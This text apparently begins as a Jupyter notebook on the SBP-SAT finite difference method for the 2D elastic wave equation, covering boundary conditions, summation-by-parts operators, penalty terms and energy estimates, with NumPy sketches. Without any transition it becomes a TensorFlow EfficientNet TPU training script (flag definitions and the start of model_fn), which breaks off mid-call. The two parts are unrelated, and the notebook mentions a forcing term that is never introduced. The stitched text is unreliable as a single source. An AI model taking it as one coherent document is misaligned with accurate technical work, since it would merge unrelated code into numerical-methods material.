# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div style='background-image: url("../../../share/images/header.svg") ; padding: 0px ; background-size: cover ; border-radius: 5px ; height: 250px'>
# <div style="float: right ; margin: 50px ; padding: 20px ; background: rgba(255 , 255 , 255 , 0.7) ; width: 50% ; height: 150px">
# <div style="position: relative ; top: 50% ; transform: translatey(-50%)">
# <div style="font-size: xx-large ; font-weight: 900 ; color: rgba(0 , 0 , 0 , 0.8) ; line-height: 100%">Computational Seismology</div>
# <div style="font-size: large ; padding-top: 20px ; color: rgba(0 , 0 , 0 , 0.5)"> SBP-SAT finite difference method for the 2D elastic wave equation in velocity-stress form </div>
# </div>
# </div>
# </div>
# This notebook is based on the paper [Dynamic earthquake rupture simulations on nonplanar faults embedded in 3D geometrically complex, heterogeneous Earth models](https://pangea.stanford.edu/~edunham/publications/Duru_Dunham_FD3d_JCP16.pdf), and on the theory of summation-by-parts (SBP) finite difference methods and weak implementation of boundary conditions using the simultaneous-approximation-term (SAT).
#
#
# ##### Authors:
# * <NAME>
#
# ---
# ## Basic Equations ##
#
# Consider the 2D elastic wave equation in velocity-stress form for a heterogeneous, isotropic elastic solid occupying the rectangle $(x,y) \in [0, L_x]\times [0, L_y]$:
#
# \begin{align}
# \rho(x,y)\frac{\partial u(x, y,t)}{\partial t} -\frac{\partial \sigma_{xx}(x,y,t)}{\partial x} -\frac{\partial \sigma_{xy}(x,y,t)}{\partial y} & = 0,\\
# \rho(x,y)\frac{\partial v(x,y,t)}{\partial t} -\frac{\partial \sigma_{xy}(x,y,t)}{\partial x} -\frac{\partial \sigma_{yy}(x,y,t)}{\partial y} & = 0, \\
# S \begin{pmatrix}
# \frac{\partial \sigma_{xx}(x,y,t)}{\partial t}\\
# \frac{\partial \sigma_{yy}(x,y,t)}{\partial t}\\
# \frac{\partial \sigma_{xy}(x,y,t)}{\partial t}
# \end{pmatrix}
# -\begin{pmatrix}
# \frac{\partial u(x,y,t)}{\partial x}\\
# \frac{\partial v(x,y,t)}{\partial y}\\
# \frac{\partial v(x,y,t)}{\partial x} + \frac{\partial u(x,y,t)}{\partial y}
# \end{pmatrix}&=0
# \end{align}
#
# where $\rho(x,y)$ is the density, $S = C^{-1}$ is the compliance matrix, and $C = C^T > 0$ is the matrix of elastic coefficients defined by
# \begin{align}
# C= \begin{pmatrix}
# 2\mu + \lambda & \lambda & 0 \\
# \lambda & 2\mu + \lambda & 0 \\
# 0 & 0 & \mu \\
# \end{pmatrix}.
# \end{align}
#
# Here, $\lambda$ and $\mu$ are the Lamé parameters, satisfying $\mu > 0$ and $2\mu + \lambda > 0$.
# The elastic wave equation supports two families of waves, P-waves and S-waves, with wavespeeds $c_p = \sqrt{\left(2\mu + \lambda\right)/\rho}$ and $c_s = \sqrt{\mu/\rho}$, respectively. At the boundaries $x = 0$, $x = L_x$, $y = 0$, $y = L_y$ we pose the general well-posed linear boundary conditions
#
# \begin{equation}
# \begin{split}
# B_{p0x}(u, \sigma_{xx}, Z_p, r_0)=\frac{Z_p}{2}\left({1-r_0}\right){u} -\frac{1+r_0}{2} {\sigma_{xx}} = 0, \quad B_{s0x}(v, \sigma_{xy}, Z_s, r_0)=\frac{Z_s}{2}\left({1-r_0}\right){v} -\frac{1+r_0}{2} {\sigma_{xy}} = 0, \quad x = 0, \\
# B_{pLx}(u, \sigma_{xx}, Z_p, r_n)=\frac{Z_p}{2}\left({1-r_n}\right){u} +\frac{1+r_n}{2} {\sigma_{xx}} = 0, \quad B_{sLx}(v, \sigma_{xy}, Z_s, r_n)=\frac{Z_s}{2}\left({1-r_n}\right){v} +\frac{1+r_n}{2} {\sigma_{xy}} = 0, \quad x = L_x, \\
# B_{p0y}(v, \sigma_{yy}, Z_p, r_0)=\frac{Z_p}{2}\left({1-r_0}\right){v} -\frac{1+r_0}{2} {\sigma_{yy}} = 0, \quad B_{s0y}(u, \sigma_{xy}, Z_s, r_0)=\frac{Z_s}{2}\left({1-r_0}\right){u} -\frac{1+r_0}{2} {\sigma_{xy}} = 0, \quad y = 0, \\
# B_{pLy}(v, \sigma_{yy}, Z_p, r_n)=\frac{Z_p}{2}\left({1-r_n}\right){v} +\frac{1+r_n}{2} {\sigma_{yy}} = 0, \quad B_{sLy}(u, \sigma_{xy}, Z_s, r_n)=\frac{Z_s}{2}\left({1-r_n}\right){u} +\frac{1+r_n}{2} {\sigma_{xy}} = 0, \quad y = L_y, \\
# \end{split}
# \end{equation}
#
# with the elastic wave impedances $Z_p = \rho c_p$, $Z_s = \rho c_s$, and the reflection coefficients $r_0$, $r_n$ being real numbers and $|r_0|, |r_n| \le 1$.
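#
# As a quick numerical sketch, the wavespeeds and impedances follow directly from these definitions (the material values below are illustrative, not taken from the notebook):

```python
import numpy as np

def wavespeeds_and_impedances(rho, mu, lam):
    """Return (c_p, c_s, Z_p, Z_s) from density and the Lame parameters."""
    c_p = np.sqrt((2.0 * mu + lam) / rho)   # P-wave speed
    c_s = np.sqrt(mu / rho)                 # S-wave speed
    return c_p, c_s, rho * c_p, rho * c_s   # impedances Z = rho * c

# Granite-like example values (assumed purely for illustration)
c_p, c_s, Z_p, Z_s = wavespeeds_and_impedances(rho=2700.0, mu=27.0e9, lam=27.0e9)
```

# Since $2\mu + \lambda > \mu$, we always have $c_p > c_s$, and hence $Z_p > Z_s$ for fixed $\rho$.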
#
# Note that $r_j = -1$ yields a soft wall, $r_j = 0$ an absorbing boundary, and $r_j = 1$ a hard wall boundary condition.
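#
# The boundary operator at a lower boundary ($x = 0$ or $y = 0$) can be written as a small helper, and the limiting cases of the reflection coefficient fall out directly. This is an illustrative sketch, not code from the accompanying notebook files:

```python
def B0(w, sigma, Z, r):
    """Lower-boundary operator: (Z/2)*(1 - r)*w - ((1 + r)/2)*sigma."""
    return 0.5 * Z * (1.0 - r) * w - 0.5 * (1.0 + r) * sigma

# r = -1 reduces to Z*w = 0      (a condition on the velocity alone),
# r = +1 reduces to -sigma = 0   (a condition on the traction alone),
# r =  0 gives (Z*w - sigma)/2   (the characteristic, absorbing combination).
```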
#
# In the coming analysis we omit external forcing, i.e. we set $F(x,y,t) = 0$, to simplify the algebra.
#
# Introduce the mechanical energy defined by
# \begin{equation}
# E(t) = \int_0^{L_y}\int_0^{L_x}{\left(\frac{\rho(x, y)}{2} \left(u^2(x, y, t) + v^2(x, y, t)\right)
# + \frac{1}{2}
# \begin{pmatrix}
# \sigma_{xx}(x,y,t)\\
# \sigma_{yy}(x,y,t)\\
# \sigma_{xy}(x,y,t)
# \end{pmatrix}^T
# S
# \begin{pmatrix}
# \sigma_{xx}(x,y,t)\\
# \sigma_{yy}(x,y,t)\\
# \sigma_{xy}(x,y,t)
# \end{pmatrix}
# \right) dxdy},
# \end{equation}
#
# where $E(t)$ is the sum of the kinetic energy and the strain energy.
# We have
#
# \begin{equation}
# \frac{d E(t)}{dt} = BT_x + BT_y \le 0,
# \end{equation}
#
# where
#
# \begin{align}
# BT_x = \int_0^{L_y}\left(\left(u(L_x, y, t)\sigma_{xx}(L_x, y, t) - u(0, y, t)\sigma_{xx}(0, y, t)\right) + \left(v(L_x, y, t)\sigma_{xy}(L_x, y, t) - v(0, y, t)\sigma_{xy}(0, y, t)\right) \right)dy\\
# BT_y = \int_0^{L_x}\left(\left(v(x, L_y, t)\sigma_{yy}(x, L_y, t) - v(x, 0, t)\sigma_{yy}(x, 0, t)\right) + \left(u(x, L_y, t)\sigma_{xy}(x, L_y, t) - u(x, 0, t)\sigma_{xy}(x, 0, t)\right) \right)dx
# \end{align}
#
# From the boundary conditions, it is easy to check that $BT_x \le 0$ and $BT_y \le 0$ for all $|r_0|, |r_n| \le 1$. This energy loss through the boundaries is what the numerical method should emulate.
#
# 1) Discretize the spatial domain:
# \begin{align}
# x_i = (i-1)\Delta{x}, \quad i = 1, 2, \dots, N_x, \quad \Delta{x} = \frac{L_x}{N_x-1}, \quad y_j = (j-1)\Delta{y}, \quad j = 1, 2, \dots, N_y, \quad \Delta{y} = \frac{L_y}{N_y-1}.
# \end{align}
#
# Denote a nodal approximation of the solution on the grid by $\mathbf{v}(t) = [v_{i,j}(t)]$, where $v_{i,j}(t) \approx v(x_i, y_j, t)$.
#
#
# 2) Introduce $\mathbf{D}$, a one space dimensional finite difference matrix satisfying the summation-by-parts property:
#
# \begin{align}
# \mathbf{D} = \mathbf{H}^{-1}\mathbf{Q}, \quad \mathbf{Q} + \mathbf{Q}^T = \left(\boldsymbol{e}_{N}\boldsymbol{e}_{N}^T -\boldsymbol{e}_{1}\boldsymbol{e}_{1}^T\right), \quad \mathbf{H}^T = \mathbf{H} > 0,
# \end{align}
#
# where $\boldsymbol{e}_{1} = [1, 0, \dots, 0 ]^T$, $\boldsymbol{e}_{N} = [ 0, 0, \dots, 1 ]^T$, and $\mathbf{H}$ defines a discrete norm. We consider only diagonal norm SBP operators with $H_{jj} = h_j > 0$, and define the quadrature rule
#
# \begin{equation}
# \sum_{j = 1}^{N} f(x_j)h_j \approx \int_{0}^{L}f(x)\, dx, \quad h_j = \alpha_j \Delta{x},
# \end{equation}
# where $\alpha_j > 0$ are dimensionless quadrature weights.
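#
# A minimal second-order SBP pair $(\mathbf{D}, \mathbf{H})$ can be built and checked against the SBP identity $\mathbf{Q} + \mathbf{Q}^T = \boldsymbol{e}_{N}\boldsymbol{e}_{N}^T - \boldsymbol{e}_{1}\boldsymbol{e}_{1}^T$ directly. This is a sketch; the notebook's own operators live in first_derivative_sbp_operators.py:

```python
import numpy as np

def sbp_2nd_order(N, dx):
    """Second-order diagonal-norm SBP first-derivative operator and norm."""
    H = dx * np.eye(N)
    H[0, 0] = H[-1, -1] = 0.5 * dx            # boundary weights alpha = 1/2
    D = np.zeros((N, N))
    for i in range(1, N - 1):                 # centered interior stencil
        D[i, i - 1], D[i, i + 1] = -0.5 / dx, 0.5 / dx
    D[0, 0], D[0, 1] = -1.0 / dx, 1.0 / dx    # one-sided boundary stencils
    D[-1, -2], D[-1, -1] = -1.0 / dx, 1.0 / dx
    return D, H

N, dx = 11, 0.1
D, H = sbp_2nd_order(N, dx)
Q = H @ D
B = np.zeros((N, N)); B[0, 0], B[-1, -1] = -1.0, 1.0
assert np.allclose(Q + Q.T, B)                     # summation-by-parts property
assert np.allclose(D @ (dx * np.arange(N)), 1.0)   # exact on linear functions
```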
#
# The operator can be easily extended to multiple dimensions using Kronecker products:
# \begin{equation}
# \mathbf{D}_x = \left(\mathbf{D}\otimes \mathbf{I}\right), \quad \mathbf{D}_y = \left(\mathbf{I}\otimes \mathbf{D}\right),
# \end{equation}
# where $\mathbf{I}$ is the identity matrix.
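#
# With NumPy, the Kronecker construction is one line per direction; applying the operators to a linear field (for which they are exact) makes the axis convention easy to verify. A sketch, assuming the 2D grid is flattened in row-major order with $x$ as the first index:

```python
import numpy as np

def sbp_D(N, h):
    """Second-order SBP first-derivative matrix (interior centered, boundaries one-sided)."""
    D = np.zeros((N, N))
    for i in range(1, N - 1):
        D[i, i - 1], D[i, i + 1] = -0.5 / h, 0.5 / h
    D[0, 0], D[0, 1] = -1.0 / h, 1.0 / h
    D[-1, -2], D[-1, -1] = -1.0 / h, 1.0 / h
    return D

Nx, Ny, dx, dy = 6, 5, 0.2, 0.25
Dx = np.kron(sbp_D(Nx, dx), np.eye(Ny))   # differentiates along x (first index)
Dy = np.kron(np.eye(Nx), sbp_D(Ny, dy))   # differentiates along y (second index)

X, Y = np.meshgrid(np.arange(Nx) * dx, np.arange(Ny) * dy, indexing="ij")
f = 2.0 * X + 3.0 * Y                     # linear field: derivatives are exact
assert np.allclose(Dx @ f.ravel(), 2.0)
assert np.allclose(Dy @ f.ravel(), 3.0)
```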
#
# The second-order accurate SBP operator for the first derivative is:
# \begin{align}
# \left(\mathbf{D}_x\mathbf{v}\right)_{i,j} = \frac{v_{i+1,j}-v_{i-1, j}}{2 \Delta{x}}, \quad i = 2, 3, \cdots N_x-1, \quad
# \left(\mathbf{D}_x\mathbf{v}\right)_{1,j} = \frac{v_{2,j}-v_{1,j}}{\Delta{x}},\quad
# \left(\mathbf{D}_x\mathbf{v}\right)_{N_x,j} = \frac{v_{N_x,j}-v_{N_x-1,j}}{\Delta{x}}.
# \end{align}
#
# \begin{align}
# \left(\mathbf{D}_y\mathbf{v}\right)_{i,j} = \frac{v_{i,j+1}-v_{i, j-1}}{2 \Delta{y}}, \quad j = 2, 3, \cdots N_y-1, \quad
# \left(\mathbf{D}_y\mathbf{v}\right)_{i,1} = \frac{v_{i,2}-v_{i,1}}{\Delta{y}},\quad
# \left(\mathbf{D}_y\mathbf{v}\right)_{i,N_y} = \frac{v_{i, N_y}-v_{i, N_y-1}}{\Delta{y}}.
# \end{align}
#
#
#
# Note that the interior stencils are centered and second-order accurate, while the boundary stencils are one-sided and first-order accurate.
#
# Higher order SBP operators can be found in the book: High Order Difference Methods for Time Dependent PDE, by <NAME>. In this notebook we implement SBP operators with interior accuracy 2, 4 and 6. The implementation of the spatial derivative operators can be found in the file first_derivative_sbp_operators.py
#
# To construct a stable semi-discrete approximation we replace the spatial derivatives by the SBP operators and impose the boundary conditions weakly as SAT terms with carefully chosen penalty weights, obtaining:
#
# \begin{align}
# \rho_{i,j}\frac{d u_{i,j}(t)}{d t} -\left(\mathbf{D}_x \boldsymbol{\sigma}_{xx}\right)_{i,j} -\left(\mathbf{D}_y \boldsymbol{\sigma}_{xy}\right)_{i,j} & = -\left(\frac{1}{h_1^{(x)}}SAT^{(1x)}_{pi,j} + \frac{1}{h_{N_x}^{(x)}}SAT^{(Nx)}_{pi,j} + \frac{1}{h_1^{(y)}}SAT^{(1y)}_{si,j} + \frac{1}{h_{N_y}^{(y)}}SAT^{(Ny)}_{si,j}\right),\\
# \rho_{i,j}\frac{d v_{i,j}(t)}{d t} - \left(\mathbf{D}_x \boldsymbol{\sigma}_{xy}\right)_{i,j} - \left(\mathbf{D}_y \boldsymbol{\sigma}_{yy}\right)_{i,j} & = -\left(\frac{1}{h_1^{(x)}}SAT^{(1x)}_{si,j} + \frac{1}{h_{N_x}^{(x)}}SAT^{(Nx)}_{si,j} + \frac{1}{h_1^{(y)}}SAT^{(1y)}_{pi,j} + \frac{1}{h_{N_y}^{(y)}}SAT^{(Ny)}_{pi,j}\right), \\
# \mathbf{S}_{i,j} \begin{pmatrix}
# \frac{d \sigma_{xxi,j}(t)}{d t}\\
# \frac{d \sigma_{yyi,j}(t)}{d t}\\
# \frac{d \sigma_{xyi,j}(t)}{d t}
# \end{pmatrix}
# -\begin{pmatrix}
# \left(\mathbf{D}_x \mathbf{u}\right)_{i,j}\\
# \left(\mathbf{D}_y \mathbf{v}\right)_{i,j}\\
# \left(\mathbf{D}_x \mathbf{v}\right)_{i,j} + \left(\mathbf{D}_y \mathbf{u}\right)_{i,j}
# \end{pmatrix}&=
# \begin{pmatrix}
# \frac{1}{Z_{pi,j}h_1^{(x)}}SAT^{(1x)}_{pi,j} - \frac{1}{Z_{pi,j}h_{N_x}^{(x)}}SAT^{(Nx)}_{pi,j}\\
# \frac{1}{Z_{pi,j}h_1^{(y)}}SAT^{(1y)}_{pi,j} - \frac{1}{Z_{pi,j}h_{N_y}^{(y)}}SAT^{(Ny)}_{pi,j}\\
# \frac{1}{Z_{si,j}h_1^{(x)}}SAT^{(1x)}_{si,j} - \frac{1}{Z_{si,j}h_{N_x}^{(x)}}SAT^{(Nx)}_{si,j} + \frac{1}{Z_{si,j}h_1^{(y)}}SAT^{(1y)}_{si,j} - \frac{1}{Z_{si,j}h_{N_y}^{(y)}}SAT^{(Ny)}_{si,j}
# \end{pmatrix}
# \end{align}
#
#
# where
#
# \begin{align}
# h_i^{(x)} = \alpha_i \Delta{x}, \quad h_j^{(y)} = \alpha_j \Delta{y},
# \end{align}
#
# and, for $l = p, s$,
#
# \begin{align}
# SAT^{(1x)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{l0x}, \quad i = 1\\
# 0, \quad i \ne 1
# \end{array} \right.
# \quad
# SAT^{(Nx)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{lLx}, \quad i = N_x\\
# 0, \quad i \ne N_x
# \end{array} \right.
# \end{align}
#
# \begin{align}
# SAT^{(1y)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{l0y}, \quad j = 1\\
# 0, \quad j \ne 1
# \end{array} \right.
# \quad
# SAT^{(Ny)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{lLy}, \quad j = N_y\\
# 0, \quad j \ne N_y
# \end{array} \right.
# \end{align}
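#
# In code, the SAT terms amount to evaluating the boundary operator at the boundary nodes only and scaling by the local quadrature weight. A hypothetical sketch for the $x = 0$ penalty on the $u$ equation (array names and shapes are assumptions, not the interface of the notebook's rate2D.py):

```python
import numpy as np

def add_sat_x0_u(rhs_u, u, sxx, Zp, r0, h1x):
    """Add the x = 0 SAT penalty to the u-equation right-hand side."""
    # Boundary operator B_{p0x} evaluated along the i = 1 edge
    B = 0.5 * Zp * (1.0 - r0) * u[0, :] - 0.5 * (1.0 + r0) * sxx[0, :]
    out = rhs_u.copy()
    out[0, :] -= B / h1x        # penalty is nonzero only at the boundary nodes
    return out

rhs = add_sat_x0_u(np.zeros((4, 3)), np.ones((4, 3)), np.ones((4, 3)),
                   Zp=2.0, r0=0.0, h1x=0.5)
```

# The remaining seven SAT terms follow the same pattern, one per boundary operator and edge.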
#
# The numerical implementation of the spatial derivatives and the boundary conditions is realized in the file rate2D.py.
#
#
# Approximating the mechanical energy by the above quadrature rule gives
# \begin{align}
# \mathcal{E}( t) = \sum_{i=1}^{N_x}\sum_{j=1}^{N_y}\left(\frac{\rho_{i,j}}{2} \left(u^2_{i,j}(t) + v^2_{i,j}(t)\right)
# + \frac{1}{2}
# \begin{pmatrix}
# \sigma_{xxi,j}(t)\\
# \sigma_{yyi,j}(t)\\
# \sigma_{xyi,j}(t)
# \end{pmatrix}^T
# S_{i,j}
# \begin{pmatrix}
# \sigma_{xxi,j}(t)\\
# \sigma_{yyi,j}(t)\\
# \sigma_{xyi,j}(t)
# \end{pmatrix}
# \right)h_i^{(x)}h_j^{(y)} > 0.
# \end{align}
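#
# The discrete energy can be evaluated with a few array operations. Here is a sketch for constant material parameters (scalars for brevity; the notebook uses spatially varying fields):

```python
import numpy as np

def discrete_energy(u, v, sxx, syy, sxy, rho, lam, mu, hx, hy):
    """Discrete mechanical energy: kinetic plus strain part, quadrature-weighted."""
    C = np.array([[2*mu + lam, lam,        0.0],
                  [lam,        2*mu + lam, 0.0],
                  [0.0,        0.0,        mu ]])
    S = np.linalg.inv(C)                       # compliance matrix S = C^{-1}
    W = np.outer(hx, hy)                       # quadrature weights h_i^{(x)} h_j^{(y)}
    kinetic = 0.5 * rho * (u**2 + v**2)
    sig = np.stack([sxx, syy, sxy])            # shape (3, Nx, Ny)
    strain = 0.5 * np.einsum('aij,ab,bij->ij', sig, S, sig)
    return np.sum((kinetic + strain) * W)
```

# Because $S$ is symmetric positive definite and all $h_i^{(x)}, h_j^{(y)} > 0$, this quantity is nonnegative and vanishes only for zero fields.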
#
# The semi-discrete approximation satisfies the energy equation:
# \begin{align}
# \frac{d \mathcal{E}( t)}{d t} = BT_{x}(t) + BT_{y}(t) \le 0,
# \end{align}
#
# where the boundary terms $BT_{\xi}$, $\xi = x, y$, are given by
#
# \begin{align}
# BT_{x}(t) = &-\frac{1}{2}\sum_{j =1}^{N_y}\left(\left(1-r_0\right)Z_{p1,j}u_{1,j}^2(t) + \frac{\left(1+r_0\right)}{Z_{p1,j}}\sigma_{xx1,j}^2(t) +
# \left(1-r_n\right)Z_{pN_x,j}u_{N_x,j}^2(t) + \frac{\left(1+r_n\right)}{Z_{pN_x,j}}\sigma_{xxN_x,j}^2(t)\right)h_j^{(y)}\\
# &-\frac{1}{2}\sum_{j =1}^{N_y}\left(\left(1-r_0\right)Z_{s1,j}v_{1,j}^2(t) + \frac{\left(1+r_0\right)}{Z_{s1,j}}\sigma_{xy1,j}^2(t) +
# \left(1-r_n\right)Z_{sN_x,j}v_{N_x,j}^2(t) + \frac{\left(1+r_n\right)}{Z_{sN_x,j}}\sigma_{xyN_x,j}^2(t)\right)h_j^{(y)},
# \end{align}
#
# and $BT_{y}(t)$ is the analogous sum over $i$ of the $y$-boundary terms, weighted by $h_i^{(x)}$. Since $|r_0|, |r_n| \le 1$, every term in these sums is nonnegative, so $BT_{x}(t) \le 0$ and $BT_{y}(t) \le 0$: the semi-discrete scheme dissipates energy through the boundaries exactly as the continuous problem does.
# models/official/efficientnet/main.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train EfficientNet models on ImageNet on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
from absl import app
from absl import flags
import numpy as np
import tensorflow as tf
import efficientnet_builder
import imagenet_input
import utils
from edgetpu import efficientnet_edgetpu_builder
from tensorflow.contrib.tpu.python.tpu import async_checkpoint
from tensorflow.contrib.training.python.training import evaluation
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.estimator import estimator
FLAGS = flags.FLAGS
FAKE_DATA_DIR = 'gs://cloud-tpu-test-datasets/fake_imagenet'
flags.DEFINE_bool(
'use_tpu', default=True,
help=('Use TPU to execute the model for training and evaluation. If'
' --use_tpu=false, will use whatever devices are available to'
' TensorFlow by default (e.g. CPU and GPU)'))
# Cloud TPU Cluster Resolvers
flags.DEFINE_string(
'tpu', default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.')
flags.DEFINE_string(
'gcp_project', default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone', default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
# Model specific flags
flags.DEFINE_string(
'data_dir', default=FAKE_DATA_DIR,
help=('The directory where the ImageNet input data is stored. Please see'
' the README.md for the expected data format.'))
flags.DEFINE_string(
'model_dir', default=None,
help=('The directory where the model and training/evaluation summaries are'
' stored.'))
flags.DEFINE_string(
'model_name',
default='efficientnet-b0',
help=('The model name among existing configurations.'))
flags.DEFINE_string(
'mode', default='train_and_eval',
help='One of {"train_and_eval", "train", "eval"}.')
flags.DEFINE_string(
'autoaugment_name', default=None,
help='If value is None, then AutoAugment will not be used. Available '
'options are: v0.')
flags.DEFINE_integer(
'train_steps', default=218949,
help=('The number of steps to use for training. Default is 218949 steps'
' which is approximately 350 epochs at batch size 2048. This flag'
' should be adjusted according to the --train_batch_size flag.'))
flags.DEFINE_integer(
'input_image_size', default=None,
help=('Input image size: it depends on specific model name.'))
flags.DEFINE_integer(
'train_batch_size', default=2048, help='Batch size for training.')
flags.DEFINE_integer(
'eval_batch_size', default=1024, help='Batch size for evaluation.')
flags.DEFINE_integer(
'num_train_images', default=1281167, help='Size of training data set.')
flags.DEFINE_integer(
'num_eval_images', default=50000, help='Size of evaluation data set.')
flags.DEFINE_integer(
'steps_per_eval', default=6255,
help=('Controls how often evaluation is performed. Since evaluation is'
' fairly expensive, it is advised to evaluate as infrequently as'
' possible (i.e. up to --train_steps, which evaluates the model only'
' after finishing the entire training regime).'))
flags.DEFINE_integer(
'eval_timeout',
default=None,
help='Maximum seconds between checkpoints before evaluation terminates.')
flags.DEFINE_bool(
'skip_host_call', default=False,
help=('Skip the host_call which is executed every training step. This is'
' generally used for generating training summaries (train loss,'
' learning rate, etc...). When --skip_host_call=false, there could'
' be a performance drop if host_call function is slow and cannot'
' keep up with the TPU-side computation.'))
flags.DEFINE_integer(
'iterations_per_loop', default=1251,
help=('Number of steps to run on TPU before outfeeding metrics to the CPU.'
' If the number of iterations in the loop would exceed the number of'
' train steps, the loop will exit before reaching'
' --iterations_per_loop. The larger this value is, the higher the'
' utilization on the TPU.'))
flags.DEFINE_integer(
'num_parallel_calls', default=64,
help=('Number of parallel threads in CPU for the input pipeline'))
flags.DEFINE_string(
'bigtable_project', None,
'The Cloud Bigtable project. If None, --gcp_project will be used.')
flags.DEFINE_string(
'bigtable_instance', None,
'The Cloud Bigtable instance to load data from.')
flags.DEFINE_string(
'bigtable_table', 'imagenet',
'The Cloud Bigtable table to load data from.')
flags.DEFINE_string(
'bigtable_train_prefix', 'train_',
'The prefix identifying training rows.')
flags.DEFINE_string(
'bigtable_eval_prefix', 'validation_',
'The prefix identifying evaluation rows.')
flags.DEFINE_string(
'bigtable_column_family', 'tfexample',
'The column family storing TFExamples.')
flags.DEFINE_string(
'bigtable_column_qualifier', 'example',
'The column name storing TFExamples.')
flags.DEFINE_string(
'data_format', default='channels_last',
help=('A flag to override the data format used in the model. The value'
' is either channels_first or channels_last. To run the network on'
' CPU or TPU, channels_last should be used. For GPU, channels_first'
' will improve performance.'))
flags.DEFINE_integer(
'num_label_classes', default=1000, help='Number of classes, at least 2')
flags.DEFINE_float(
'batch_norm_momentum',
default=None,
help=('Batch normalization layer momentum of moving average to override.'))
flags.DEFINE_float(
'batch_norm_epsilon',
default=None,
help=('Batch normalization layer epsilon to override.'))
flags.DEFINE_bool(
'transpose_input', default=True,
help='Use TPU double transpose optimization')
flags.DEFINE_bool(
'use_bfloat16',
default=False,
help=('Whether to use bfloat16 as activation for training.'))
flags.DEFINE_string(
'export_dir',
default=None,
help=('The directory where the exported SavedModel will be stored.'))
flags.DEFINE_bool(
'export_to_tpu', default=False,
help=('Whether to export additional metagraph with "serve, tpu" tags'
' in addition to "serve" only metagraph.'))
flags.DEFINE_float(
'base_learning_rate',
default=0.016,
help=('Base learning rate when train batch size is 256.'))
flags.DEFINE_float(
'momentum', default=0.9,
help=('Momentum parameter used in the MomentumOptimizer.'))
flags.DEFINE_float(
'moving_average_decay', default=0.9999,
help=('Moving average decay rate.'))
flags.DEFINE_float(
'weight_decay', default=1e-5,
help=('Weight decay coefficient for L2 regularization.'))
flags.DEFINE_float(
'label_smoothing', default=0.1,
help=('Label smoothing parameter used in the softmax_cross_entropy'))
flags.DEFINE_float(
'dropout_rate', default=None,
help=('Dropout rate for the final output layer.'))
flags.DEFINE_float(
'drop_connect_rate', default=None,
help=('Drop connect rate for the network.'))
flags.DEFINE_integer('log_step_count_steps', 64, 'The number of steps at '
'which the global step information is logged.')
flags.DEFINE_bool(
'use_cache', default=True, help=('Enable cache for training input.'))
flags.DEFINE_float(
'depth_coefficient', default=None,
help=('Depth coefficient for scaling number of layers.'))
flags.DEFINE_float(
'width_coefficient', default=None,
help=('Width coefficient for scaling channel size.'))
flags.DEFINE_bool(
'use_async_checkpointing', default=False, help=('Enable async checkpoint'))
def model_fn(features, labels, mode, params):
"""The model_fn to be used with TPUEstimator.
Args:
features: `Tensor` of batched images.
labels: `Tensor` of labels for the data samples
mode: one of `tf.estimator.ModeKeys.{TRAIN,EVAL,PREDICT}`
params: `dict` of parameters passed to the model from the TPUEstimator,
`params['batch_size']` is always provided and should be used as the
effective batch size.
Returns:
A `TPUEstimatorSpec` for the model
"""
if isinstance(features, dict):
features = features['feature']
# In most cases, the default data format NCHW instead of NHWC should be
# used for a significant performance boost on GPU. NHWC should be used
# only if the network needs to be run on CPU since the pooling operations
# are only supported on NHWC. TPU uses XLA compiler to figure out best layout.
if FLAGS.data_format == 'channels_first':
assert not FLAGS.transpose_input # channels_first only for GPU
features = tf.transpose(features, [0, 3, 1, 2])
stats_shape = [3, 1, 1]
else:
stats_shape = [1, 1, 3]
if FLAGS.transpose_input and mode != tf.estimator.ModeKeys.PREDICT:
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
has_moving_average_decay = (FLAGS.moving_average_decay > 0)
# This is essential, if using a keras-derived model.
tf.keras.backend.set_learning_phase(is_training)
tf.logging.info('Using open-source implementation.')
override_params = {}
if FLAGS.batch_norm_momentum is not None:
override_params['batch_norm_momentum'] = FLAGS.batch_norm_momentum
if FLAGS.batch_norm_epsilon is not None:
override_params['batch_norm_epsilon'] = FLAGS.batch_norm_epsilon
if FLAGS.dropout_rate is not None:
override_params['dropout_rate'] = FLAGS.dropout_rate
if FLAGS.drop_connect_rate is not None:
override_params['drop_connect_rate'] = FLAGS.drop_connect_rate
if FLAGS.data_format:
override_params['data_format'] = FLAGS.data_format
if FLAGS.num_label_classes:
override_params['num_classes'] = FLAGS.num_label_classes
if FLAGS.depth_coefficient:
override_params['depth_coefficient'] = FLAGS.depth_coefficient
if FLAGS.width_coefficient:
override_params['width_coefficient'] = FLAGS.width_coefficient
def normalize_features(features, mean_rgb, stddev_rgb):
"""Normalize the image given the means and stddevs."""
features -= tf.constant(mean_rgb, shape=stats_shape, dtype=features.dtype)
features /= tf.constant(stddev_rgb, shape=stats_shape, dtype=features.dtype)
return features
def build_model():
"""Build model using the model_name given through the command line."""
model_builder = None
if FLAGS.model_name.startswith('efficientnet-edgetpu'):
model_builder = efficientnet_edgetpu_builder
elif FLAGS.model_name.startswith('efficientnet'):
model_builder = efficientnet_builder
else:
raise ValueError(
'Model must be either efficientnet-b* or efficientnet-edgetpu*')
normalized_features = normalize_features(features, model_builder.MEAN_RGB,
model_builder.STDDEV_RGB)
logits, _ = model_builder.build_model(
normalized_features,
